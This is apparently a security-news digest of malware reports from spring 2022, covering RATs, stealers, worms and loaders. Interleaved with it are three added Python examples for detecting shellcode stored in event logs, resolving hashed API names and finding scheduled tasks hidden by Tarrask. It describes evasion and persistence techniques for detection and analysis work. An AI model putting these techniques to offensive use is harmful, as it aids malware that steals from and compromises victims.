A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K. Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low volume email-borne phishing campaign that started on April 26, 2022. "The newly identified Nerbian RAT leverages multiple anti-analysis components spread across several stages, including multiple open-source libraries," Proofpoint researchers said in a report shared with The Hacker News. "It is written in operating system (OS) agnostic Go programming language, compiled for 64-bit systems, and leverages several encryption routines to further evade network analysis." The messages, amounting to less than 100 in number, purport to be from the World Health Organization about safety measures related to COVID-19, urging potential victims to open a macrThe Hacker News
May 11, 2022
New stealthy Nerbian RAT malware spotted in ongoing attacks Full Text
Abstract
A new remote access trojan called Nerbian RAT has been discovered that includes a rich set of features, including the ability to evade detection and analysis by researchers.BleepingComputer
May 11, 2022
Malicious NPM Packages Target German Companies in Supply Chain Attack Full Text
Abstract
Cybersecurity researchers have discovered a number of malicious packages in the NPM registry specifically targeting a number of prominent media, logistics, and industrial firms based in Germany to carry out supply chain attacks. "Compared with most malware found in the NPM repository, this payload seems particularly dangerous: a highly-sophisticated, obfuscated piece of malware that acts as a backdoor and allows the attacker to take total control over the infected machine," researchers from JFrog said in a new report. The DevOps company said that evidence points to it being either the work of a sophisticated threat actor or a "very aggressive" penetration test. All the rogue packages, most of which have since been removed from the repository, have been traced to four "maintainers" - bertelsmannnpm, boschnodemodules, stihlnodemodules, and dbschenkernpm — indicating an attempt to impersonate legitimate firms like Bertelsmann, Bosch, Stihl, and DB ScThe Hacker News
May 11, 2022
New IceApple exploit toolset deployed on Microsoft Exchange servers Full Text
Abstract
Security researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography.BleepingComputer
May 11, 2022
DCRat Being Sold on Russian Hacking Forums at Dirt Cheap Rates Full Text
Abstract
Malware authors were spotted selling a capable trojan named DCRat on underground forums. The still-under-development threat comes equipped with a variety of information-stealing abilities. As for protection, always install a reliable anti-malware solution.Cyware Alerts - Hacker News
May 11, 2022
NetDooka Leverages PrivateLoader Distribution Service to Infect Victims Full Text
Abstract
The new NetDooka malware framework is being distributed by PrivateLoader’s PPI service that features a loader, a dropper, a protection driver, and a powerful NetDooka RAT. PrivateLoader PPI is a malware distribution platform that uses SEO poisoning and files uploaded to torrent sites.Cyware Alerts - Hacker News
May 11, 2022
Raspberry Robin Worm Found Dropping Malware Full Text
Abstract
A new malware dubbed Raspberry Robin, having worm-like capabilities, is spreading via external USB drives to target several firms' networks in the technology and manufacturing sectors. The worm abuses Windows Installer (msiexec.exe) to make a connection to its C2 servers. Go through this repor ...Cyware Alerts - Hacker News
May 10, 2022
Experts Detail Saintstealer and Prynt Stealer Info-Stealing Malware Families Full Text
Abstract
Cybersecurity researchers have dissected the inner workings of an information-stealing malware called Saintstealer that's designed to siphon credentials and system information. "After execution, the stealer extracts username, passwords, credit card details, etc.," Cyble researchers said in an analysis last week. "The stealer also steals data from various locations across the system and compresses it in a password-protected ZIP file." A 32-bit C# .NET-based executable with the name "saintgang.exe," Saintstealer is equipped with anti-analysis checks, opting to terminate itself if it's running either in a sandboxed or virtual environment. The malware can capture a wide range of information that ranges from taking screenshots to gathering passwords, cookies, and autofill data stored in Chromium-based browsers such as Google Chrome, Opera, Edge, Brave, Vivaldi, and Yandex, among others. It can also steal Discord multi-factor authentication tokeThe Hacker News
May 09, 2022
Experts Sound Alarm on DCRat Backdoor Being Sold on Russian Hacking Forums Full Text
Abstract
Cybersecurity researchers have shed light on an actively maintained remote access trojan called DCRat (aka DarkCrystal RAT) that's offered on sale for "dirt cheap" prices, making it accessible to professional cybercriminal groups and novice actors alike. "Unlike the well-funded, massive Russian threat groups crafting custom malware [...], this remote access Trojan (RAT) appears to be the work of a lone actor, offering a surprisingly effective homemade tool for opening backdoors on a budget," BlackBerry researchers said in a report shared with The Hacker News. "In fact, this threat actor's commercial RAT sells at a fraction of the standard price such tools command on Russian underground forums." Written in .NET by an individual codenamed "boldenis44" and "crystalcoder," DCRat is a full-featured backdoor whose functionalities can be further augmented by third-party plugins developed by affiliates using a dedicated integratedThe Hacker News
May 9, 2022
DCRat, only $5 for a fully working remote access trojan Full Text
Abstract
Researchers warn of a remote access trojan called DCRat (aka DarkCrystal RAT) that is available for sale on Russian cybercrime forums. Cybersecurity researchers from BlackBerry are warning of a remote access trojan called DCRat (aka DarkCrystal RAT)...Security Affairs
May 09, 2022
Another Set of Joker Trojan-Laced Android Apps Resurfaces on Google Play Store Full Text
Abstract
A new set of trojanized apps spread via the Google Play Store has been observed distributing the notorious Joker malware on compromised Android devices. Joker, a repeat offender, refers to a class of harmful apps that are used for billing and SMS fraud, while also performing a number of actions of a malicious hacker's choice, such as stealing text messages, contact lists, and device information. Despite continued attempts on the part of Google to scale up its defenses, the apps have been continually iterated to search for gaps and slip into the app store undetected. "They're usually spread on Google Play, where scammers download legitimate apps from the store, add malicious code to them and re-upload them to the store under a different name," Kaspersky researcher Igor Golovin said in a report published last week. The trojanized apps, taking the place of their removed counterparts, often appear as messaging, health tracking, and PDF scanner apps that, onceThe Hacker News
May 09, 2022
Hackers are now hiding malware in Windows Event Logs Full Text
Abstract
Security researchers have noticed a malicious campaign that used Windows event logs to store malware, a technique that has not been previously documented publicly for attacks in the wild.BleepingComputer
May 7, 2022
Raspberry Robin spreads via removable USB devices Full Text
Abstract
Researchers discovered a new Windows malware, dubbed Raspberry Robin, with worm-like capabilities that spreads via removable USB devices. Cybersecurity researchers from Red Canary have spotted a new Windows malware, dubbed Raspberry Robin, with worm-like...Security Affairs
May 7, 2022
Malware campaign hides a shellcode into Windows event logs Full Text
Abstract
Experts spotted a malware campaign that is the first one using a technique of hiding a shellcode into Windows event logs. In February 2022 researchers from Kaspersky spotted a malicious campaign using a novel technique that consists of hiding the shellcode...Security Affairs
May 06, 2022
This New Fileless Malware Hides Shellcode in Windows Event Logs Full Text
Abstract
A new malicious campaign has been spotted taking advantage of Windows event logs to stash chunks of shellcode for the first time in the wild. "It allows the 'fileless' last stage trojan to be hidden from plain sight in the file system," Kaspersky researcher Denis Legezo said in a technical write-up published this week. The stealthy infection process, not attributed to a known actor, is believed to have commenced in September 2021 when the intended targets were lured into downloading compressed .RAR files containing Cobalt Strike and Silent Break. The adversary simulation software modules are then used as a launchpad to inject code into Windows system processes or trusted applications. Also notable is the use of anti-detection wrappers as part of the toolset, suggesting an attempt on the part of the operators to fly under the radar. One of the key methods is to keep encrypted shellcode containing the next-stage malware as 8KB pieces in event logs, a never-bThe Hacker News
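The three items above describe the same technique: the next-stage payload is encrypted, cut into 8KB pieces and written as ordinary event log records, and a loader later reads them back and joins them. That description leads directly to a hunting check. The Python below is an added example, not code from the page or from Kaspersky: it walks event records, flags bodies that are at most one chunk long and high-entropy (encrypted data looks random; log text does not), and stitches the flagged records back together in record order. The provider name, event ID and the records themselves are constructed for the sample; the real campaign's log category and event IDs are not given on this page.

```python
import math
import random
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class EventRecord:
    """Minimal stand-in for one event log record (constructed for this example)."""
    record_id: int
    provider: str
    event_id: int
    data: bytes  # raw event data / message body as bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for encrypted/random data, roughly 4 to 5 for log text."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_shellcode_chunks(events, chunk_size=8 * 1024, min_len=64, min_entropy=6.5):
    """Return records whose body looks like a piece of an encrypted blob:
    no longer than one chunk (the final piece may be shorter) and high-entropy."""
    return [ev for ev in events
            if min_len <= len(ev.data) <= chunk_size
            and shannon_entropy(ev.data) >= min_entropy]


def reassemble(hits):
    """Group flagged records by (provider, event_id) and join their bodies in
    record order, which is how a loader would rebuild the payload."""
    groups = defaultdict(list)
    for ev in hits:
        groups[(ev.provider, ev.event_id)].append(ev)
    return {key: b"".join(ev.data for ev in sorted(recs, key=lambda e: e.record_id))
            for key, recs in groups.items()}


def build_sample_events(seed=7, chunk_size=8 * 1024):
    """Constructed sample: two benign text records plus a random 'payload' split
    into chunk_size pieces under a made-up provider and event ID."""
    payload = random.Random(seed).randbytes(2 * chunk_size + 500)
    benign = (b"The Windows Update service entered the running state. "
              b"The service was started by the Service Control Manager on behalf of "
              b"the local system account and completed initialisation normally.")
    events = [EventRecord(1, "Service Control Manager", 7036, benign),
              EventRecord(2, "Microsoft-Windows-Security-Auditing", 4624,
                          b"An account was successfully logged on. Logon Type: 2. " * 3)]
    for i in range(0, len(payload), chunk_size):
        events.append(EventRecord(10 + i // chunk_size, "ExampleProvider", 1000,
                                  payload[i:i + chunk_size]))
    return events, payload


if __name__ == "__main__":
    events, payload = build_sample_events()
    hits = find_shellcode_chunks(events)
    for key, blob in reassemble(hits).items():
        print(f"{key}: {len(hits)} records, {len(blob)} bytes, matches={blob == payload}")
```

Against a live system the same functions can be fed records exported from the event log (for instance the binary event data of each record); the entropy threshold is the tunable part, since compressed or base64 bodies from legitimate providers can score above 6 bits per byte and should be allow-listed by provider rather than by lowering the bar.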
May 6, 2022
Steer clear of fake premium mobile app unlockers Full Text
Abstract
The site offers “tweaked apps”, apparently available with a single click and requiring “no jailbreak, no root.” There’s an OnlyFans Premium, Netflix Premium, a Pokemon Go Spoofer Injector, and many more.Malwarebytes Labs
May 06, 2022
Researchers Warn of ‘Raspberry Robin’ Malware Spreading via External Drives Full Text
Abstract
Cybersecurity researchers have discovered a new Windows malware with worm-like capabilities and is propagated by means of removable USB devices. Attributing the malware to a cluster named "Raspberry Robin," Red Canary researchers noted that the worm "leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL." The earliest signs of the activity are said to date back to September 2021, with infections observed in organizations with ties to technology and manufacturing sectors. Attack chains pertaining to Raspberry Robin start with connecting an infected USB drive to a Windows machine. Present within the device is the worm payload, which appears as a .LNK shortcut file to a legitimate folder. The worm then takes care of spawning a new process using cmd.exe to read and execute a malicious file stored on the external drive. This is followed by launching explorer.exe and msiexec.exe, the latter of which is used for externThe Hacker News
May 6, 2022
NetDooka framework distributed via a pay-per-install (PPI) malware service Full Text
Abstract
Researchers discovered a sophisticated malware framework, dubbed NetDooka, distributed via a pay-per-install (PPI) malware service known as PrivateLoader. Trend Micro researchers uncovered a sophisticated malware framework dubbed NetDooka that is distributed...Security Affairs
May 05, 2022
New Raspberry Robin worm uses Windows Installer to drop malware Full Text
Abstract
Red Canary intelligence analysts have discovered a new Windows malware with worm capabilities that spreads using external USB drives.BleepingComputer
May 05, 2022
New NetDooka malware spreads via poisoned search results Full Text
Abstract
A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device.BleepingComputer
May 04, 2022
Pixiv, DeviantArt artists hit by NFT job offers pushing malware Full Text
Abstract
Users on Pixiv, DeviantArt, and other creator-oriented online platforms report receiving multiple messages from people claiming to be from the "Cyberpunk Ape Executives" NFT project, with the main goal to infect artists' devices with information-stealing malware.BleepingComputer
May 03, 2022
Conti, REvil, LockBit ransomware bugs exploited to block encryption Full Text
Abstract
Hackers commonly exploit vulnerabilities in corporate networks to gain access, but a researcher has turned the tables by finding exploitable bugs in the most common ransomware and malware being distributed today.BleepingComputer
May 2, 2022
Analysis on recent wiper attacks: examples and how wiper malware works Full Text
Abstract
In the last two months, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time.AT&T Cybersecurity
May 01, 2022
Open source ‘Package Analysis’ tool finds malicious npm, PyPI packages Full Text
Abstract
The Open Source Security Foundation (OpenSSF), a Linux Foundation-backed initiative, has released the first prototype version of its 'Package Analysis' tool, which aims to catch and counter malicious attacks on open source registries. The open source tool, released on GitHub, was able to identify over 200 malicious npm and PyPI packages.BleepingComputer
April 28, 2022
EmoCheck now detects new 64-bit versions of Emotet malware Full Text
Abstract
The Japan CERT has released a new version of their EmoCheck utility to detect new 64-bit versions of the Emotet malware that began infecting users this month.BleepingComputer
April 28, 2022
New RIG Exploit Kit Campaign Infecting Victims’ PCs with RedLine Stealer Full Text
Abstract
A new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan. "When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server," Bitdefender said in a new report shared with The Hacker News. Most of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others. Exploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware. The primary infection method used by attackers to distribute exploit kits, in this case theThe Hacker News
April 28, 2022
New Bumblebee malware replaces Conti’s BazarLoader in cyberattacks Full Text
Abstract
A newly discovered malware loader called Bumblebee is likely the latest development of the Conti syndicate, designed to replace the BazarLoader backdoor used to deliver ransomware payloads.BleepingComputer
April 27, 2022
Package Planting: Are You Unknowingly Maintaining Poisoned Packages? Full Text
Abstract
Aqua’s Team Nautilus found a logical flaw in npm that allows threat actors to masquerade a malicious package as legitimate and trick unsuspecting developers into installing it.Aquasec
April 27, 2022
RIG Exploit Kit drops RedLine malware via Internet Explorer bug Full Text
Abstract
Threat analysts have uncovered yet another large-scale campaign delivering the RedLine stealer malware onto worldwide targets.BleepingComputer
April 26, 2022
Emotet malware now installs via PowerShell in Windows shortcut files Full Text
Abstract
The Emotet botnet is now using Windows shortcut files (.LNK) containing PowerShell commands to infect victims' computers, moving away from Microsoft Office macros, which are now disabled by default.BleepingComputer
April 26, 2022
Prynt Stealer: A Newly Discovered Threat Full Text
Abstract
Cybersecurity analysts have detected yet another info-stealer malware infection, named Prynt Stealer, offering powerful capabilities and extra keylogger and clipper modules. The developer of the stealer claims the recent version of the stealer is undetectable. Users are suggested to use a stro ...Cyware Alerts - Hacker News
April 25, 2022
Emotet malware infects users again after fixing broken installer Full Text
Abstract
The Emotet malware phishing campaign is up and running again after the threat actors fixed a bug preventing people from becoming infected when they opened malicious email attachments.BleepingComputer
April 25, 2022
The ink-stained trail of GOLDBACKDOOR Full Text
Abstract
Stairwell assesses with medium-high confidence that GOLDBACKDOOR is the successor of, or used in parallel with, the malware BLUELIGHT, attributed to APT37 / Ricochet Chollima.Stairwell
April 25, 2022
New BotenaGo Malware Variant Targeting Lilin Security Camera DVR Devices Full Text
Abstract
A new variant of an IoT botnet called BotenaGo has emerged in the wild, specifically singling out Lilin security camera DVR devices to infect them with Mirai malware. Dubbed "Lilin Scanner" by Nozomi Networks, the latest version is designed to exploit a two-year-old critical command injection vulnerability in the DVR firmware that was patched by the Taiwanese company in February 2020. BotenaGo, first documented in November 2021 by AT&T Alien Labs, is written in Golang and features over 30 exploits for known vulnerabilities in web servers, routers and other kinds of IoT devices. The botnet's source code has since been uploaded to GitHub, making it ripe for abuse by other criminal actors. "With only 2,891 lines of code, BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code," the researchers said this year. The new BotenaGo malware is the latest to exploit vulnerabilities in LilThe Hacker News
April 25, 2022
Defeating BazarLoader Anti-Analysis Techniques Full Text
Abstract
It employs two distinctive anti-analysis techniques. The first is API function hashing, a known trick to obfuscate which functions are called. The second is an opaque predicate, a technique used for control flow obfuscation.Palo Alto Networks
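API function hashing, the first of the two techniques named above, works by storing a 32-bit hash of each Windows API name instead of the name itself; at run time the loader walks a DLL's export table, hashes every export and calls the one whose hash matches, so the strings an analyst would grep for never appear in the binary. An analyst reverses it the same way: hash a list of known export names and look the embedded constants up. The Python below is an added example, not Palo Alto's tooling or BazarLoader code. ROR-13 is assumed here as a representative rolling hash (the page does not say which function or constants BazarLoader uses, and real samples change the rotate count and add a seed), and the export list is a constructed sample rather than a real DLL's export table.

```python
from typing import Dict, Iterable, List, Tuple

MASK32 = 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """ROR-13 rolling hash over the ASCII bytes of an export name (assumed
    algorithm; substitute the rotate count and seed recovered from the sample)."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & MASK32  # rotate right by 13 within 32 bits
        h = (h + b) & MASK32
    return h


def malware_style_lookup(target: int, exports: Iterable[str], hash_fn=ror13_hash):
    """What the loader does: scan the export table and return the first name
    whose hash equals the embedded constant, or None if no export matches."""
    for name in exports:
        if hash_fn(name) == target:
            return name
    return None


def build_hash_table(exports: Iterable[str], hash_fn=ror13_hash) -> Dict[int, str]:
    """What the analyst does: precompute hash -> name for every known export."""
    table: Dict[int, str] = {}
    for name in exports:
        h = hash_fn(name)
        if h in table and table[h] != name:
            raise ValueError(f"hash collision: {table[h]} / {name}")
        table[h] = name
    return table


def resolve_hashes(hashes: Iterable[int], table: Dict[int, str]) -> List[Tuple[int, str]]:
    """Map constants pulled from a binary back to API names; unknown hashes are
    reported rather than guessed, since they may come from a DLL not yet tabled."""
    return [(h, table.get(h, "<unresolved>")) for h in hashes]


# Constructed sample of kernel32 export names; a real run would take the full
# export table of each DLL the sample loads.
SAMPLE_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateThread", "WriteProcessMemory", "CreateRemoteThread", "WinExec",
    "ExitProcess", "Sleep",
]


if __name__ == "__main__":
    table = build_hash_table(SAMPLE_EXPORTS)
    # constants as they might appear in a loader's hash list
    embedded = [ror13_hash("VirtualAlloc"), ror13_hash("CreateThread"), 0xDEADBEEF]
    for h, name in resolve_hashes(embedded, table):
        print(f"0x{h:08X} -> {name}")
    print(malware_style_lookup(ror13_hash("WinExec"), SAMPLE_EXPORTS))
```

In practice the hash function is recovered first from the sample's own lookup routine (the rotate count, whether names are upper-cased, and any seed or XOR key), and the table is then built from real export tables, for example with pefile; with the wrong function every constant simply comes back unresolved, which is itself the signal that the algorithm guess was wrong.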
April 25, 2022
New powerful Prynt Stealer malware sells for just $100 per month Full Text
Abstract
Threat analysts have spotted yet another addition to the growing space of info-stealer malware infections, named Prynt Stealer, which offers powerful capabilities and extra keylogger and clipper modules.BleepingComputer
April 22, 2022
Emotet Revamp: New Payloads and 64-Bit Modules Full Text
Abstract
According to Kaspersky, Emotet infection has seen a ten-fold increase from February to March, going from 3,000 to 30,000 emails. It is switching to new payloads detected by fewer antivirus engines.Cyware Alerts - Hacker News
April 21, 2022
Hackers Sneak ‘More_Eggs’ Malware Into Resumes Sent to Corporate Hiring Managers Full Text
Abstract
A new set of phishing attacks delivering the more_eggs malware has been observed striking corporate hiring managers with bogus resumes as an infection vector, a year after potential candidates looking for work on LinkedIn were lured with weaponized job offers. "This year the more_eggs operation has flipped the social engineering script, targeting hiring managers with fake resumes instead of targeting jobseekers with fake job offers," eSentire's research and reporting lead, Keegan Keplinger, said in a statement. The Canadian cybersecurity company said it identified and disrupted four separate security incidents, three of which occurred at the end of March. Targeted entities include a U.S.-based aerospace company, an accounting business located in the U.K., a law firm, and a staffing agency, both based out of Canada. The malware, suspected to be the handiwork of a threat actor called Golden Chickens (aka Venom Spider), is a stealthy, modular backdoor suite capableThe Hacker News
April 21, 2022
Freely-Distributed Ginzo Stealer Malware Pilfers Browser Data, Discord Tokens, and Crypto Wallets Full Text
Abstract
Ginzo stealer is obfuscated with ConfuserEx, resulting in error messages when trying to decompile the code. That is because the type initializer .cctor decrypts the actual code on the fly. It also initializes data required for string decryption.G-Data Security Blog
April 20, 2022
Inno Stealer - Fake Windows 11 Upgrade Spreads Infostealer Full Text
Abstract
The new infostealer malware targets various web browsers and crypto wallets such as Chrome, Brave, Comodo, Opera, Vivaldi, Edge, 360 Browser, GeroWallet, BraveWallet, and GuildWallet.Cyware Alerts - Hacker News
April 20, 2022
New BotenaGo variant specifically targets Lilin security camera DVR devices Full Text
Abstract
Researchers spotted a new variant of the BotenaGo botnet malware that is considered highly evasive and has a zero-detection rate. The BotenaGo botnet was first spotted in November 2021 by researchers at AT&T, the malicious code leverages...Security Affairs
April 19, 2022
New SolarMarker Variant with Improved Evasion Tactics Full Text
Abstract
SolarMarker operators were observed using signed files, obfuscated PowerShell scripts, large files, and impersonation of legitimate software installers to stay undetected.Cyware Alerts - Hacker News
April 19, 2022
New SolarMarker variant upgrades evasion abilities to avoid detection Full Text
Abstract
Researchers disclosed a new variant of the SolarMarker malware that implements new techniques to avoid detection. Cybersecurity researchers from Palo Alto Networks disclosed a new version of the SolarMarker malware that implements new features to avoid...Security Affairs
April 19, 2022
New stealthy BotenaGo malware variant targets DVR devices Full Text
Abstract
Threat analysts have spotted a new variant of the BotenaGo botnet malware, and it's the stealthiest seen so far, running undetected by any anti-virus engine.BleepingComputer
April 18, 2022
New SolarMarker Malware Variant Using Updated Techniques to Stay Under the Radar Full Text
Abstract
Cybersecurity researchers have disclosed a new version of the SolarMarker malware that packs in new improvements with the goal of updating its defense evasion abilities and staying under the radar. "The recent version demonstrated an evolution from Windows Portable Executables (EXE files) to working with Windows installer package files (MSI files)," Palo Alto Networks Unit 42 researchers said in a report published this month. "This campaign is still in development and going back to using executables files (EXE) as it did in its earlier versions." SolarMarker, also called Jupyter, leverages manipulated search engine optimization (SEO) tactics as its primary infection vector. It's known for its information stealing and backdoor features, enabling the attackers to steal data stored in web browsers and execute arbitrary commands retrieved from a remote server. In February 2022, the operators of SolarMarker were observed using stealthy Windows Registry trickThe Hacker News
April 18, 2022
Unofficial Windows 11 upgrade installs info-stealing malware Full Text
Abstract
Hackers are luring unsuspecting users with a fake Windows 11 upgrade that comes with malware that steals browser data and cryptocurrency wallets.BleepingComputer
April 18, 2022
New BotenaGo Variant Discovered by Nozomi Networks Labs Full Text
Abstract
Researchers from Nozomi Networks Labs discovered a new variant of the Golang-based BotenaGo malware that specifically targets vulnerabilities in Lilin security camera DVR devices.Security Boulevard
April 15, 2022
Pipedream, an extremely versatile malware toolkit, could be used for targeting power grids, refineries, and other ICS systems Full Text
Abstract
The United States government has issued an advisory for the malware toolkit dubbed Pipedream that cybercriminal groups could use to potentially target all critical infrastructure owners worldwide.ARS Technica
April 14, 2022
Windows 11 tool to add Google Play secretly installed malware Full Text
Abstract
A popular Windows 11 ToolBox script used to add the Google Play Store to the Android Subsystem has secretly infected users with malicious scripts, Chrome extensions, and potentially other malware.BleepingComputer
April 14, 2022
Hafnium’s New Malware Hides Behind Scheduled Tasks Full Text
Abstract
Microsoft linked the Chinese-backed Hafnium group to Tarrask, a defense evasion tool used to attain persistence on compromised Windows environments. Researchers uncovered a recent malicious activity wherein hackers abused an unpatched zero-day vulnerability for their initia ...Cyware Alerts - Hacker News
April 14, 2022
New ZingoStealer infostealer drops more malware, cryptominers Full Text
Abstract
A new information-stealing malware called ZingoStealer has been discovered with powerful data-stealing features and the ability to load additional payloads or mine Monero.BleepingComputer
April 13, 2022
Microsoft Exposes Evasive Chinese Tarrask Malware Attacking Windows Computers Full Text
Abstract
The Chinese-backed Hafnium hacking group has been linked to a piece of a new malware that's used to maintain persistence on compromised Windows environments. The threat actor is said to have targeted entities in the telecommunication, internet service provider and data services sectors from August 2021 to February 2022, expanding from the initial victimology patterns observed during its attacks exploiting the then zero-day flaws in Microsoft Exchange Servers in March 2021. Microsoft Threat Intelligence Center (MSTIC), which dubbed the defense evasion malware "Tarrask," characterized it as a tool that creates "hidden" scheduled tasks on the system. "Scheduled task abuse is a very common method of persistence and defense evasion — and an enticing one, at that," the researchers said. Hafnium, while most notable for Exchange Server attacks, has since leveraged unpatched zero-day vulnerabilities as initial vectors to drop web shells and other malThe Hacker News
April 13, 2022
Fakecalls - An Unusual Twist to Banking Customer Support Frauds Full Text
Abstract
A new banking trojan called Fakecalls hijacks phone conversations between a potential victim and its bank customer support to steal files stored on devices. The trojan can play a pre-recorded message that mimics the ones often used by banks to greet customers seeking support. Experts suggest down ...Cyware Alerts - Hacker News
April 12, 2022
New Octo Banking Trojan Abuses Android Accessibility Features Full Text
Abstract
ThreatFabric stumbled across Octo, a rental banking trojan capable of gaining remote access to compromised devices. It is said to be a rebrand of a similar Android threat called ExobotCompact. The malicious apps acting as droppers are identified as Pocket Screencaster, Fast Cleaner 2021, Play Store ...Cyware Alerts - Hacker News
April 12, 2022
New META Stealer is Popular in the Underground Marketplaces Full Text
Abstract
A researcher unearthed a malspam campaign distributing the new META infostealer to steal passwords stored in browsers, including Google Chrome, Edge, and Firefox, as well as cryptocurrency wallets. META tampers with Windows Defender using PowerShell to exclude .exe files from scanning to avoid ...Cyware Alerts - Hacker News
April 12, 2022
Microsoft: New malware uses Windows bug to hide scheduled tasks Full Text
Abstract
Microsoft has discovered a new malware used by the Chinese-backed Hafnium hacking group to maintain persistence on compromised Windows systems by creating and hiding scheduled tasks.BleepingComputer
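The three Tarrask items above all turn on one mechanism: every scheduled task has a registry key under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, and deleting that key's SD (security descriptor) value makes the task disappear from schtasks /query and the Task Scheduler UI while the task keeps running. That gives a direct hunting check: list Tree subkeys that carry an Id value (so they are tasks, not folders) but no SD value. The Python below is an added example, not Microsoft's own script or guidance text; the registry snapshot it inspects offline is constructed, and load_tree_from_registry reads the live key only when run elevated on Windows.

```python
import sys
from typing import Dict, List, Set

# Per-task keys live under this path; each task key normally carries Id, Index and SD.
TREE_PATH = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree"


def find_hidden_tasks(tree: Dict[str, Set[str]]) -> List[str]:
    """tree maps a path relative to TaskCache\\Tree (e.g. r"Microsoft\\Windows\\Foo")
    to the set of registry value names present on that key. Folder keys have no Id;
    a task key with Id but without SD has had its security descriptor removed,
    which is what hides it from the scheduler's enumeration APIs."""
    return sorted(path for path, values in tree.items()
                  if "Id" in values and "SD" not in values)


def load_tree_from_registry() -> Dict[str, Set[str]]:
    """Walk the live Tree key recursively (Windows only; run as Administrator)."""
    import winreg  # only importable on Windows

    tree: Dict[str, Set[str]] = {}

    def walk(rel: str) -> None:
        full = TREE_PATH if not rel else TREE_PATH + "\\" + rel
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, full) as key:
            n_sub, n_val, _ = winreg.QueryInfoKey(key)
            tree[rel] = {winreg.EnumValue(key, i)[0] for i in range(n_val)}
            for i in range(n_sub):
                child = winreg.EnumKey(key, i)
                walk(child if not rel else rel + "\\" + child)

    walk("")
    return tree


def sample_tree() -> Dict[str, Set[str]]:
    """Constructed snapshot standing in for the registry on a non-Windows host."""
    return {
        "": set(),                       # the Tree root itself
        "Microsoft": set(),              # a folder, no Id and no SD: not a task
        r"Microsoft\Windows": set(),
        r"Microsoft\Windows\Defrag\ScheduledDefrag": {"Id", "Index", "SD"},
        "Backup": {"Id", "Index", "SD"},
        "WinUpdate": {"Id", "Index"},    # Id present, SD missing: hidden task
    }


if __name__ == "__main__":
    tree = load_tree_from_registry() if sys.platform == "win32" else sample_tree()
    hidden = find_hidden_tasks(tree)
    print(f"{len(tree)} keys walked, {len(hidden)} task(s) without an SD value")
    for path in hidden:
        print("  " + path)
```

Each hit's Id value points at the matching Tasks\{GUID} key, whose Actions value tells you what the task actually runs, so the next step after a hit is to read that key before deciding whether to delete the task or restore a security descriptor and let it enumerate normally again.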
April 12, 2022
Industroyer2: Industroyer reloaded Full Text
Abstract
ESET researchers responded to a cyber-incident affecting an energy provider in Ukraine. The collaboration resulted in the discovery of a new variant of Industroyer malware named Industroyer2.ESET Security
April 11, 2022
Third npm protestware: ‘event-source-polyfill’ calls Russia out Full Text
Abstract
Developers are increasingly voicing their opinions through their open source projects in active use by thousands of software applications and organizations. Most recently, the developer of the 'event-source-polyfill' npm package peacefully protested Russia's "unreasonable invasion" of Ukraine, to Russian consumers.BleepingComputer
April 11, 2022
Rise in npm protestware: another open source dev calls Russia out Full Text
Abstract
Developers are increasingly voicing their opinions through their open source projects in active use by thousands of software applications and organizations. Most recently, the developer of the 'event-source-polyfill' npm package peacefully protested Russia's "unreasonable invasion" of Ukraine, to Russian consumers.BleepingComputer
April 11, 2022
FFDroider, a new information-stealing malware disguised as Telegram app Full Text
Abstract
Cybersecurity researchers spotted a new Windows information-stealing malware, named FFDroider, designed to steal credentials and cookies. Cybersecurity researchers from Zscaler ThreatLabz warn of a new information-stealing malware, named FFDroider,...Security Affairs
April 11, 2022
Qbot malware switches to new Windows Installer infection vector Full Text
Abstract
The Qbot botnet is now pushing malware payloads via phishing emails with password-protected ZIP archive attachments containing malicious MSI Windows Installer packages.BleepingComputer
April 11, 2022
Android banking malware intercepts calls to customer support Full Text
Abstract
A banking trojan for Android that researchers call Fakecalls comes with a powerful capability that enables it to take over calls to a bank's customer support number and connect the victim directly with the cybercriminals operating the malware.BleepingComputer
April 11, 2022
Fakecalls Banking Trojan Makes Fake Calls to Korean Bank Customers Full Text
Abstract
Fakecalls mimics the mobile apps of popular Korean banks, among them KB (Kookmin Bank) and KakaoBank. Curiously, in addition to the usual logos, the Trojan’s creators display the support numbers of the respective banks on the Fakecalls screen.Kaspersky Lab
April 11, 2022
Researchers warn of FFDroider and Lightning info-stealers targeting users in the wild Full Text
Abstract
